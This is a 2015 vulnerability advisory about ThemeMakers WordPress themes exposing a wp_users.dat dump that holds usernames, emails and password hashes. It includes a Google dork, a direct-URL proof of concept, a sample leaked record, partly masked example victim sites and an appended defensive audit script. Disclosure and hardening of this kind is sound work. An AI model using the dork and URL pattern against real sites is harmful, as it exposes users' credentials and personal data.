WordPress 'ALL Themes' Developed By "ThemeMakers" File Information Exposure

2015.05.18
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# WordPress 'ALL Themes' Developed By "ThemeMakers" File Information Exposure
# CWE: CWE-538
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 15/05/2015
# Vendor Homepage: http://themeforest.net/user/ThemeMakers/portfolio (ALL THEMES)
# Google Dork: inurl:/wp-content/uploads/tmm_db_migrate/
# PoC : http://SITE.com/wp-content/uploads/tmm_db_migrate/wp_users.dat

Target File: wp_users.dat

array (
  0 => array (
    'ID' => '1',
    'user_login' => 'xxxxxx',
    'user_pass' => '$P$B5GFS1KH2VkkSZhAOAu0MT.XbNtZ1Q0',
    'user_nicename' => '',
    'user_email' => 'xxxxx@gmail.com',
    'user_url' => '',
    'user_registered' => '2014-05-06 13:22:47',
    'user_activation_key' => '',
    'user_status' => '0',
    'display_name' => '',
  ),
)

# Examples:
http://ibermallXa.com/wp-content/uploads/tmm_db_migrate/wp_users.dat
http://bdfotXo.net/wp-content/uploads/tmm_db_migrate/wp_users.dat
http://www.cXy-play.com/wp-content/uploads/tmm_db_migrate/wp_users.dat

# Themes Probably Affected:
Diplomat | Political WordPress Theme
Car Dealer / Auto Dealer Responsive WP Theme
Invento Responsive Gallery/Architecture Template
Accio One Page Parallax Responsive WordPress Theme
Accio Responsive Parallax One Page Site Template
Axioma Premium Responsive WordPress Theme
Almera Responsive Portfolio WordPress Theme
Almera Responsive Portfolio Site Template
Goodnex Premium Responsive WordPress Theme
GamesTheme Premium WordPress Theme
Blessing Premium Responsive WordPress Theme
SmartIT Premium Responsive WordPress Theme
....
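As an added defensive check that is not part of the original advisory: a site owner can run the following Python script against their own WordPress document root to locate any tmm_db_migrate dumps, report which sensitive wp_users columns they expose (matching the var_export layout shown above), and drop an .htaccess that denies web access to the directory. The directory name comes from the advisory; the Apache 2.4 directive is only honoured where AllowOverride permits it, and the sample site tree and dump contents are constructed placeholders.

```python
import re
import tempfile
from pathlib import Path

# Upload sub-directory the ThemeMakers migration feature writes its dumps into (from the advisory).
MIGRATE_DIR = "tmm_db_migrate"
# wp_users columns whose exposure matters most (password hash, e-mail, activation key).
SENSITIVE_FIELDS = ("user_pass", "user_email", "user_activation_key")
# Apache 2.4 directive blocking web access; only honoured where AllowOverride permits it.
HTACCESS_DENY = "# Block direct access to ThemeMakers DB migration dumps\nRequire all denied\n"

def find_migration_dumps(wp_root):
    """Return every .dat file under any tmm_db_migrate directory below wp_root."""
    return sorted(p for p in Path(wp_root).glob(f"**/{MIGRATE_DIR}/*.dat") if p.is_file())

def sensitive_fields_in(dump_path):
    """List which sensitive wp_users columns a dump exposes (matches the var_export layout)."""
    text = Path(dump_path).read_text(errors="replace")
    return [f for f in SENSITIVE_FIELDS if re.search(rf"'{f}'\s*=>", text)]

def audit(wp_root, fix=False):
    """Map each leaked dump to the sensitive fields it contains; optionally deny web access."""
    report = {}
    for dump in find_migration_dumps(wp_root):
        report[str(dump)] = sensitive_fields_in(dump)
        if fix:  # hide the whole dump directory; the dumps should still be deleted afterwards
            (dump.parent / ".htaccess").write_text(HTACCESS_DENY)
    return report
# Constructed sample mirroring the advisory's wp_users.dat layout (placeholder values only).
SAMPLE_DUMP = """array (
  0 => array (
    'ID' => '1',
    'user_pass' => '$P$PLACEHOLDER_HASH',
    'user_email' => 'admin@example.com',
  ),
)
"""

def build_sample_site():
    """Create a throwaway WordPress-like tree holding one leaked dump; returns its root."""
    root = Path(tempfile.mkdtemp(prefix="wp_"))
    migrate = root / "wp-content" / "uploads" / MIGRATE_DIR
    migrate.mkdir(parents=True)
    (migrate / "wp_users.dat").write_text(SAMPLE_DUMP)
    return root

if __name__ == "__main__":
    for path, fields in audit(build_sample_site(), fix=True).items():
        print(f"{path}: exposes {', '.join(fields)}")
```

Against a real install, call `audit("/path/to/wordpress", fix=True)` and then remove the reported files once the migration is complete.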


Copyright 2019, cxsecurity.com